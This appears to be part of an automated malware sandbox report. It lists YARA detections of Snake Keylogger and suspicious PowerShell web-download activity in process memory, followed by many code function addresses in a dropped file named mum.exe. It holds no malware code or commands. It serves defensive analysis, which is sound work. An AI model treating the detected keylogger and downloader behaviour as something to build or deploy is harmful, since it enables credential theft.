Source: 00000009.00000002.937588508.0000000001C56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.964450317.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.937344564.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2016, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
Source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2572, type: MEMORYSTR	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 2572, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
Source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 684, type: MEMORYSTR	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 684, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11

Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_00240588	8_2_00240588
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_00243699	8_2_00243699
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_00240911	8_2_00240911
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_00241990	8_2_00241990
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_00241CA2	8_2_00241CA2
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_0024A8F0	8_2_0024A8F0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_0024A900	8_2_0024A900
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_00241A31	8_2_00241A31
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_00243FA0	8_2_00243FA0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_048B89A0	8_2_048B89A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_048B58FE	8_2_048B58FE
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_048B0048	8_2_048B0048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_054C0048	8_2_054C0048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_054C6C52	8_2_054C6C52
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_054C0006	8_2_054C0006
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CE440	15_2_002CE440
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CE89C	15_2_002CE89C
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CECF0	15_2_002CECF0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CC17F	15_2_002CC17F
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C3576	15_2_002C3576
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CF148	15_2_002CF148
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C9151	15_2_002C9151
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CF5A4	15_2_002CF5A4
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CF9FB	15_2_002CF9FB
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CC5DC	15_2_002CC5DC
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C2620	15_2_002C2620
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C3A38	15_2_002C3A38
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CCA30	15_2_002CCA30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C4E58	15_2_002C4E58
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CCE88	15_2_002CCE88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C3E98	15_2_002C3E98
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CD2E0	15_2_002CD2E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C42F9	15_2_002C42F9
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CD738	15_2_002CD738
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C2F18	15_2_002C2F18
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C4758	15_2_002C4758
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CDB90	15_2_002CDB90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002CDFE8	15_2_002CDFE8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C89C8	15_2_002C89C8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C89D8	15_2_002C89D8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C1B48	15_2_002C1B48
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E6838	15_2_003E6838
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003ED238	15_2_003ED238
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003EA620	15_2_003EA620
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E7E18	15_2_003E7E18
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E3810	15_2_003E3810
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E1600	15_2_003E1600
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E8270	15_2_003E8270
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003EAC68	15_2_003EAC68
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E1A58	15_2_003E1A58
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E5258	15_2_003E5258
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E0048	15_2_003E0048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E1EB0	15_2_003E1EB0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003EB2B0	15_2_003EB2B0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E04A0	15_2_003E04A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E6C90	15_2_003E6C90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E08F8	15_2_003E08F8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E56D8	15_2_003E56D8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E86C8	15_2_003E86C8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E5B30	15_2_003E5B30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E2D20	15_2_003E2D20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E8B20	15_2_003E8B20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E7110	15_2_003E7110
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E4500	15_2_003E4500
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003EB900	15_2_003EB900
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E8F78	15_2_003E8F78
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E7568	15_2_003E7568
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E0D50	15_2_003E0D50
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003EBF50	15_2_003EBF50
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E11A8	15_2_003E11A8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003EC5A0	15_2_003EC5A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E5F88	15_2_003E5F88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E9980	15_2_003E9980
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003ECBF0	15_2_003ECBF0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E63E0	15_2_003E63E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E9FD0	15_2_003E9FD0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E79C0	15_2_003E79C0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E6828	15_2_003E6828
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E0012	15_2_003E0012
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003EA610	15_2_003EA610
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E7E09	15_2_003E7E09
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E3800	15_2_003E3800
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E8260	15_2_003E8260
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E1A4C	15_2_003E1A4C
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E86B8	15_2_003E86B8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E3498	15_2_003E3498
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E0490	15_2_003E0490
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E3489	15_2_003E3489
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E6C80	15_2_003E6C80
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E44F0	15_2_003E44F0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E08E8	15_2_003E08E8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E56D0	15_2_003E56D0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E5B20	15_2_003E5B20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E2D13	15_2_003E2D13
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E8B10	15_2_003E8B10
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E7102	15_2_003E7102
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E5F78	15_2_003E5F78
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E8F69	15_2_003E8F69
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E7558	15_2_003E7558
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E0D41	15_2_003E0D41
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E79B1	15_2_003E79B1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E1198	15_2_003E1198
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E15F1	15_2_003E15F1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_003E63D1	15_2_003E63D1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_00270588	19_2_00270588
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_00273699	19_2_00273699
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_0027091A	19_2_0027091A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_00271990	19_2_00271990
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_00271CA2	19_2_00271CA2
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_00276E30	19_2_00276E30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_002762A7	19_2_002762A7
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_00272840	19_2_00272840
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_0027A8F0	19_2_0027A8F0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_0027A900	19_2_0027A900
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_00271A31	19_2_00271A31
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_00273FA0	19_2_00273FA0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_00F089A0	19_2_00F089A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_00F00048	19_2_00F00048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_05356C50	19_2_05356C50
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_05350048	19_2_05350048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CE440	26_2_001CE440
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CE89A	26_2_001CE89A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CECF0	26_2_001CECF0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C9151	26_2_001C9151
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CF148	26_2_001CF148
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CC17F	26_2_001CC17F
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C3576	26_2_001C3576
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CF5A2	26_2_001CF5A2
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CF9FA	26_2_001CF9FA
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CC5E2	26_2_001CC5E2
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C3A38	26_2_001C3A38
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CCA30	26_2_001CCA30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C2620	26_2_001C2620
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C4E58	26_2_001C4E58
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C3E98	26_2_001C3E98
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CCE88	26_2_001CCE88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C42F9	26_2_001C42F9
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CD2E0	26_2_001CD2E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C2F18	26_2_001C2F18
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CD738	26_2_001CD738
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C4758	26_2_001C4758
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CDB90	26_2_001CDB90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001CDFE8	26_2_001CDFE8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C89D8	26_2_001C89D8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C89C8	26_2_001C89C8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C1B48	26_2_001C1B48
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002EA620	26_2_002EA620
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E6838	26_2_002E6838
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002ED238	26_2_002ED238
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E1600	26_2_002E1600
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E7E18	26_2_002E7E18
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E3810	26_2_002E3810
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002EAC68	26_2_002EAC68
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E8270	26_2_002E8270
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E0048	26_2_002E0048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E1A58	26_2_002E1A58
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E5258	26_2_002E5258
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E04A0	26_2_002E04A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E1EB0	26_2_002E1EB0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002EB2B0	26_2_002EB2B0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E6C90	26_2_002E6C90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E08F8	26_2_002E08F8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E86C8	26_2_002E86C8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E56D8	26_2_002E56D8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E2D20	26_2_002E2D20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E8B20	26_2_002E8B20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E5B30	26_2_002E5B30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E4500	26_2_002E4500
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002EB900	26_2_002EB900
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E7110	26_2_002E7110
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E7568	26_2_002E7568
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E8F78	26_2_002E8F78
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E0D50	26_2_002E0D50
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002EBF50	26_2_002EBF50
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E11A8	26_2_002E11A8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002EC5A0	26_2_002EC5A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E5F88	26_2_002E5F88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E9980	26_2_002E9980
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E63E0	26_2_002E63E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002ECBF0	26_2_002ECBF0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E79C0	26_2_002E79C0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E9FD0	26_2_002E9FD0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E6828	26_2_002E6828
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E7E09	26_2_002E7E09
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E0012	26_2_002E0012
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002EA611	26_2_002EA611
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E8260	26_2_002E8260
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E1A4A	26_2_002E1A4A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E1EAA	26_2_002E1EAA
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E86B8	26_2_002E86B8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E3489	26_2_002E3489
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E6C80	26_2_002E6C80
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E3498	26_2_002E3498
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E0490	26_2_002E0490
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E08E8	26_2_002E08E8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E44F0	26_2_002E44F0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E5B20	26_2_002E5B20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E7102	26_2_002E7102
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E2D12	26_2_002E2D12
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E8B10	26_2_002E8B10
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E8F69	26_2_002E8F69
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E5F78	26_2_002E5F78
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E0D41	26_2_002E0D41
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E7558	26_2_002E7558
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E79B1	26_2_002E79B1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E1198	26_2_002E1198
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E15F1	26_2_002E15F1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_002E63D1	26_2_002E63D1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002C0588	29_2_002C0588
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002C3699	29_2_002C3699
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002C0911	29_2_002C0911
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002C1990	29_2_002C1990
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002C1CA2	29_2_002C1CA2
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002C0577	29_2_002C0577
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002C2840	29_2_002C2840
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002CA8F0	29_2_002CA8F0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002CA900	29_2_002CA900
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002C1A31	29_2_002C1A31
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_002C3FA0	29_2_002C3FA0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_00EC89A0	29_2_00EC89A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_00EC0048	29_2_00EC0048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_05120048	29_2_05120048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025E440	34_2_0025E440
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025E89A	34_2_0025E89A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025ECF0	34_2_0025ECF0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_00253561	34_2_00253561
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025C17F	34_2_0025C17F
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025F148	34_2_0025F148
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_00259151	34_2_00259151
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025F5A2	34_2_0025F5A2
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025F9FA	34_2_0025F9FA
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025C5DA	34_2_0025C5DA
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_00252620	34_2_00252620
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025CA30	34_2_0025CA30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_00253A38	34_2_00253A38
